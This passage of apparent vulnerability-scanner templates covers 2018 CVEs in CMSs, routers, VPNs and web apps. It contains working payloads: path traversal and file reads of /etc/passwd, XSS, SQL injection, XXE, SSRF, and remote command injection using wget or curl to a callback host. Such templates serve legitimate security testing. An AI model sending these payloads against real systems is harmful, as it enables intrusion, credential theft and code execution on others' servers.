HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>/graphics/common/screen/dotclear.gif"]},{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Variables.cs_imagedir"],"condition":"and"}]}]},{"id":"CVE-2018-8770","info":{"name":"Cobub Razor 0.8.0 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/tests/generate.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Fatal error: Class 'PHPUnit_Framework_TestCase' not found in ","/application/third_party/CIUnit/libraries/CIUnitTestCase.php on line"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18570","info":{"name":"Planon <Live Build 41 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wicket/resource/nl.planon.pssm.dashboard.cre.engine.wicket.page.AbstractDashboardPage/html/nodata.html?nodatamsg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18925","info":{"name":"Gogs (Go Git Service) 0.11.66 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nCookie: lang=en-US; i_like_gogits=../../../../etc/passwd;\n","GET / HTTP/1.1\nHost: {{Hostname}}\nCookie: lang=en-US; i_like_gogits=../../../../etc/dummy;\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_1 == 500 && status_code_2 == 200 && contains(body_2, \"<meta name=\\\"author\\\" content=\\\"Gogs\\\" />\")"]}]}]},{"id":"CVE-2018-12095","info":{"name":"OEcms 3.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cms/info.php?mod=list%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16288","info":{"name":"LG SuperSign EZ CMS 2.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-9845","info":{"name":"Etherpad Lite <1.6.4 - Admin Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/Admin"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Etherpad version","Plugin manager","Installed parts"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-5316","info":{"name":"WordPress SagePay Server Gateway for WooCommerce <1.0.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=</script>\"><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script>\"><script>alert(document.domain)</script>","Authenticate your card"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10095","info":{"name":"Dolibarr <7.0.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/dolibarr/adherents/cartes/carte.php?&mode=cardlogin&foruserlogin=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&model=5160&optioncss=print"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-13980","info":{"name":"Zeta Producer Desktop CMS <14.2.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc/passwd&do=download"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-6184","info":{"name":"Zeit Next.js <4.2.3 -  Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/_next/../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10141","info":{"name":"Palo Alto Networks PAN-OS GlobalProtect <8.1.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/global-protect/login.esp?user=j%22;-alert(1)-%22x"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var valueUser = \"j\";-alert(1)-\"x\";"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-17422","info":{"name":"DotCMS < 5.0.2 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://evil.com","{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=evil.com"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["self.location = 'http://evil.com'","location.href = 'http\\x3a\\x2f\\x2fwww\\x2eevil\\x2ecom'"]}]}]},{"id":"CVE-2018-7490","info":{"name":"uWSGI PHP Plugin Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19877","info":{"name":"Adiscon LogAnalyzer <4.1.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/src/login.php?referer=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\"><script>confirm(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-8033","info":{"name":"Apache OFBiz 16.11.04 - XML Entity Injection","severity":"high"},"requests":[{"raw":["POST /webtools/control/xmlrpc HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Language: en\nContent-Type: application/xml\n\n<?xml version=\"1.0\"?><!DOCTYPE x [<!ENTITY disclose SYSTEM \"file://///etc/passwd\">]><methodCall><methodName>&disclose;</methodName></methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18323","info":{"name":"Centos Web Panel 0.9.8.480 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/index.php?module=file_editor&file=/../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-8006","info":{"name":"Apache ActiveMQ <=5.15.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/queues.jsp?QueueFilter=yu1ey%22%3e%3cscript%3ealert(%221%22)%3c%2fscript%3eqb68"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"><script>alert(\"1\")</script>"]},{"type":"word","part":"header","words":["/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16167","info":{"name":"LogonTracer <=1.2.0 - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST /upload HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogtype=XML&timezone=1%3Bwget+http%3A%2F%2F{{interactsh-url}}%3B\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2018-13379","info":{"name":"Fortinet FortiOS - Credentials Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"],"matchers":[{"type":"regex","part":"body","regex":["^var fgt_lang ="]}]}]},{"id":"CVE-2018-7662","info":{"name":"CouchCMS <= 2.0 - Path Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/includes/mysql2i/mysql2i.func.php","{{BaseURL}}/addons/phpmailer/phpmailer.php"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["mysql2i.func.php on line 10","Fatal error: Cannot redeclare mysql_affected_rows() in"],"condition":"and"},{"type":"word","part":"body","words":["phpmailer.php on line 10","Fatal error: Call to a menber function add_event_listener() on a non-object in"],"condition":"and"}]}]},{"id":"CVE-2018-18069","info":{"name":"WordPress sitepress-multilingual-cms 3.6.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-admin/admin.php"],"body":"icl_post_action=save_theme_localization&locale_file_name_en=EN\"><script>alert(0);</script>\n","host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains(tolower(header), \"text/html\")","contains(set_cookie, \"_icl_current_admin_language\")","contains(body, \"\\\"><script>alert(0);</script>\")"],"condition":"and"}]}]},{"id":"CVE-2018-20608","info":{"name":"Imcat 4.4 - Phpinfo Configuration","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/imcat/root/tools/adbug/binfo.php?phpinfo1"],"matchers-condition":"and","matchers":[{"type":"word","words":["PHP Extension","PHP Version"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"],"part":"body"}]}]},{"id":"CVE-2018-6008","info":{"name":"Joomla! Jtag Members Directory 5.3.7 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jtagmembersdirectory&task=attachment&download_file=../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-11231","info":{"name":"Opencart Divido - Sql Injection","severity":"high"},"requests":[{"raw":["POST /upload/index.php?route=extension/payment/divido/update HTTP/1.1\nHost: {{Hostname}}\n\n{\"metadata\":{\"order_id\":\"1 and updatexml(1,concat(0x7e,(SELECT md5({{num}})),0x7e),1)\"},\"status\":2}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10956","info":{"name":"IPConfigure Orchid Core VMS 2.0.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20009","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/ssl-provider.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_ssl_provider=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_url=&new_notes=\n","GET /assets/ssl-providers.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, \"><script>alert(document.domain)</script></a>\")"],"condition":"and"}]}]},{"id":"CVE-2018-16763","info":{"name":"FUEL CMS 1.4.1 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-14728","info":{"name":"Responsive filemanager 9.13.1 Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/filemanager/upload.php"],"body":"fldr=&url=file:///etc/passwd","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2018-19365","info":{"name":"Wowza Streaming Engine Manager 4.7.4.01 - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/passwd&logSource=engine"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-5233","info":{"name":"Grav CMS <1.3.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/tools/a--%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"body","words":["/themes/grav","Grav Admin Login","data-grav-"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16716","info":{"name":"NCBI ToolBox - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/blast/nph-viewgif.cgi?../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19386","info":{"name":"SolarWinds Database Performance Analyzer 11.1.457 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/iwc/idcStateError.iwc?page=javascript%3aalert(document.domain)%2f%2f"],"matchers-condition":"and","matchers":[{"type":"word","words":["<a href=\"javascript:alert(document.domain)//"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1000671","info":{"name":"Sympa version =>6.2.16 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/sympa?referer=http://interact.sh&passwd=&previous_action=&action=login&action_login=&previous_list=&list=&email="],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2018-7602","info":{"name":"Drupal - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /?q=user%2Flogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_id=user_login&name={{username}}&pass={{password}}&op=Log+in\n","GET /?q={{url_encode(\"{{userid}}\")}}%2Fcancel HTTP/1.1\nHost: {{Hostname}}\n","POST /?q={{url_encode(\"{{userid}}\")}}%2Fcancel&destination={{url_encode(\"{{userid}}\")}}%2Fcancel%3Fq%5B%2523post_render%5D%5B%5D%3Dpassthru%26q%5B%2523type%5D%3Dmarkup%26q%5B%2523markup%5D%3Decho+COP-2067-8102-EVC+|+rev HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_id=user_cancel_confirm_form&form_token={{form_token}}&_triggering_element_name=form_id&op=Cancel+account\n","POST /?q=file%2Fajax%2Factions%2Fcancel%2F%23options%2Fpath%2F{{form_build_id}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_build_id={{form_build_id}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"word","words":["CVE-2018-7602-POC"]}],"extractors":[{"type":"regex","name":"userid","group":1,"regex":["<meta about=\"([/a-z0-9]+)\" property=\"foaf"],"internal":true,"part":"body"},{"type":"regex","name":"form_token","group":1,"regex":["<input type=\"hidden\" name=\"form_token\" value=\"(.*)\" />"],"internal":true,"part":"body"},{"type":"regex","name":"form_build_id","group":1,"regex":["<input type=\"hidden\" name=\"form_build_id\" value=\"(.*)\" />"],"internal":true,"part":"body"}]}]},{"id":"CVE-2018-16836","info":{"name":"Rubedo CMS <=3.4.0 - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10818","info":{"name":"LG NAS Devices - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /system/sharedir.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n&uid=10; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'\n","POST /en/php/usb_sync.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n&act=sync&task_number=1;curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2018-16299","info":{"name":"WordPress Localize My Post 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7700","info":{"name":"DedeCMS 5.7SP2 - Cross-Site Request Forgery/Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md5%28%22CVE-2018-7700%22%29%3B{/dede:field}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["4cc32a3a81d2bb37271934a48ce4468a"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-8719","info":{"name":"WordPress WP Security Audit Log 3.1.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/uploads/wp-security-audit-log/failed-logins/"],"matchers-condition":"and","matchers":[{"type":"word","words":["[TXT]",".log","Index of"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-2392","info":{"name":"SAP Internet Graphics Server (IGS) - XML External Entity Injection","severity":"high"},"requests":[{"raw":["POST /XMLCHART HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary={{randstr_1}}\n\n--{{randstr_1}}\nContent-Disposition: form-data; name=\"{{randstr_2}}\"; filename=\"{{randstr_3}}.xml\"\nContent-Type: application/xml\n\n<?xml version='1.0' encoding='UTF-8'?>\n    <ChartData>\n      <Categories>\n        <Category>ALttP</Category>\n      </Categories>\n      <Series label=\"{{randstr_4}}\">\n        <Point>\n          <Value type=\"y\">12345</Value>\n        </Point>\n      </Series>\n    </ChartData>\n--{{randstr_1}}\nContent-Disposition: form-data; name=\"{{randstr_5}}\"; filename=\"{{randstr_6}}.xml\"\nContent-Type: application/xml\n\n<?xml version='1.0' encoding='UTF-8'?>\n    <!DOCTYPE Extension [<!ENTITY xxe SYSTEM \"/etc/passwd\">]>\n    <SAPChartCustomizing version=\"1.1\">\n      <Elements>\n        <ChartElements>\n          <Title>\n            <Extension>&xxe;</Extension>\n          </Title>\n        </ChartElements>\n      </Elements>\n    </SAPChartCustomizing>\n--{{randstr_1}}--\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Picture","Info","/output/"],"condition":"and"},{"type":"word","part":"body","words":["ImageMap","Errors"],"condition":"or"},{"type":"word","part":"header","words":["text/html","SAP Internet Graphics Server"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1000130","info":{"name":"Jolokia Agent - JNDI Code Injection","severity":"high"},"requests":[{"raw":["POST /jolokia/read/getDiagnosticOptions HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.\nContent-Type: application/x-www-form-urlencoded\n\n{\n   \"type\":\"read\",\n   \"mbean\":\"java.lang:type=Memory\",\n   \"target\":{\n      \"url\":\"service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat\"\n   }\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Failed to retrieve RMIServer stub: javax.naming.CommunicationException: 127.0.0.1:1389"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-13380","info":{"name":"Fortinet FortiOS - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E%3B","{{BaseURL}}/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(1337)>","<script>alert(1337)</script>"],"condition":"or"},{"type":"word","part":"header","negative":true,"words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16341","info":{"name":"Nuxeo <10.3 - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/nuxeo/login.jsp/pwn${31333333330+7}.xhtml"],"matchers":[{"type":"word","part":"body","words":["31333333337"]}]}]},{"id":"CVE-2018-12675","info":{"name":"SV3C HD Camera L Series - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/web/cgi-bin/hi3510/param.cgi?cmd=setmobilesnapattr&cururl=http%3A%2F%2Finteract.sh"],"matchers":[{"type":"word","part":"body","words":["<META http-equiv=\"Refresh\" content=\"0;URL=http://interact.sh\">"]}]}]},{"id":"CVE-2018-12909","info":{"name":"Webgrind <= 1.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?op=fileviewer&file=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","webgrind"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18775","info":{"name":"Microstrategy Web 7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/microstrategy7/Login.asp?Server=Server001&Project=Project001&Port=0&Uid=Uid001&Msg=%22%3E%3Cscript%3Ealert(/{{randstr}}/)%3B%3C%2Fscript%3E%3C"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(/{{randstr}}/);</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-14064","info":{"name":"VelotiSmart Wifi - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-2791","info":{"name":"Oracle Fusion Middleware WebCenter Sites - Cross-Site Scripting","severity":"high"},"requests":[{"raw":["GET /cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/confirmmakeasset&cs_imagedir=qqq%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{BaseURL}}\n","GET /cs/Satellite?destpage=\"<h1xxx\"><script>alert(document.domain)</script>&pagename=OpenMarket%2FXcelerate%2FUIFramework%2FLoginError HTTP/1.1\nHost: {{BaseURL}}\n"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>/graphics/common/screen/dotclear.gif"]},{"type":"word","part":"body","words":["<script>alert(24)</script>","Missing translation key"],"condition":"and"}]}]},{"id":"CVE-2018-11227","info":{"name":"Monstra CMS <=3.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /admin/index.php?id=pages HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogin=\"><svg/onload=alert(document.domain)>&password=xxxxxx&login_submit=Log+In\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><svg/onload=alert(document.domain)>","Monstra"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-11759","info":{"name":"Apache Tomcat JK Connect <=1.2.44 - Manager Access","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/jkstatus","{{BaseURL}}/jkstatus;"],"matchers-condition":"and","matchers":[{"type":"word","words":["JK Status Manager"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-12054","info":{"name":"Schools Alert Management Script - Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/img.php?f=/./etc/./passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-14931","info":{"name":"Polarisft Intellect Core Banking Software Version 9.7.1 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/IntellectMain.jsp?IntellectSystem=https://www.interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2018-17254","info":{"name":"Joomla! JCK Editor SQL Injection","severity":"critical"},"requests":[{"raw":["GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=\"%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5({{num}})),NULL,NULL,NULL,NULL,NULL--%20aa HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}\n"],"matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]}]}]},{"id":"CVE-2018-0127","info":{"name":"Cisco RV132W/RV134W Router - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/dumpmdm.cmd"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Dump","MDM","cisco","admin"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19914","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/dns.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_dns1=abc&new_ip1=&new_dns2=abc&new_ip2=&new_dns3=abc&new_ip3=&new_dns4=&new_ip4=&new_dns5=&new_ip5=&new_dns6=&new_ip6=&new_dns7=&new_ip7=&new_dns8=&new_ip8=&new_dns9=&new_ip9=&new_dns10=&new_ip10=&new_notes=%3Cscript%3Ealert%281%29%3C%2Fscript%3E\n","GET /assets/dns.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, \"><script>alert(document.domain)</script></a>\")"],"condition":"and"}]}]},{"id":"CVE-2018-10822","info":{"name":"D-Link Routers - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/uir//etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-0296","info":{"name":"Cisco ASA - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions"],"headers":{"Accept-Encoding":"deflate"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["///sessions"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-14916","info":{"name":"Loytec LGATE-902 <6.4.2 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7467","info":{"name":"AxxonSoft Axxon Next - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET //css//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\\win.ini HTTP/1.1\nHost: {{Hostname}}\n\n"],"unsafe":true,"matchers":[{"type":"word","part":"body","words":["bit app 